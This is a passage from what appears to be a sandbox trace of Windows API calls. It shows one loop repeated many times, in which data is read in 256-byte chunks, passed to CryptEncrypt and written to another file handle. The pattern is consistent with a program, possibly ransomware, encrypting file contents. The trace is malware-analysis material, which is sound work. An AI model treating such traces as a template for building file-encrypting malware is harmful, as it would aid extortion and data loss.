Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.018] GetLastError () returned 0x0 [0164.018] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.018] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.018] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.018] GetLastError () returned 0x0 [0164.018] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.018] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.018] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.018] GetLastError () returned 0x0 [0164.018] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.018] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.018] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.018] GetLastError () returned 0x0 [0164.018] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.018] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.018] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.018] GetLastError () returned 0x0 [0164.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.019] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.019] GetLastError () returned 0x0 [0164.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.019] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.019] GetLastError () returned 0x0 [0164.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.019] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.019] GetLastError () returned 0x0 [0164.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.019] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.019] GetLastError () returned 0x0 [0164.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.019] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.019] GetLastError () returned 0x0 [0164.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.019] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.019] GetLastError () returned 0x0 [0164.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.020] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.020] GetLastError () returned 0x0 [0164.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.020] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.020] GetLastError () returned 0x0 [0164.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.020] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.020] GetLastError () returned 0x0 [0164.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.020] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.020] GetLastError () returned 0x0 [0164.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.020] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.020] GetLastError () returned 0x0 [0164.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.020] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.020] GetLastError () returned 0x0 [0164.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.021] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.021] GetLastError () returned 0x0 [0164.021] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.021] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.021] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.021] GetLastError () returned 0x0 [0164.021] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.021] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.021] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.021] GetLastError () returned 0x0 [0164.021] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.021] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.021] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.021] GetLastError () returned 0x0 [0164.021] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.021] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.021] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.021] GetLastError () returned 0x0 [0164.021] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.021] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.021] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.021] GetLastError () returned 0x0 [0164.021] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.021] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.021] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.022] GetLastError () returned 0x0 [0164.022] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.022] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.022] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.022] GetLastError () returned 0x0 [0164.022] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.022] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.022] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.022] GetLastError () returned 0x0 [0164.022] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.022] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.022] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.022] GetLastError () returned 0x0 [0164.022] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.022] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.022] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.022] GetLastError () returned 0x0 [0164.022] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.022] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.022] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.022] GetLastError () returned 0x0 [0164.022] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.022] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.022] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.022] GetLastError () returned 0x0 [0164.022] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.023] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.023] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.023] GetLastError () returned 0x0 [0164.023] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.023] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.023] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.023] GetLastError () returned 0x0 [0164.023] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.023] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.023] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.023] GetLastError () returned 0x0 [0164.023] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 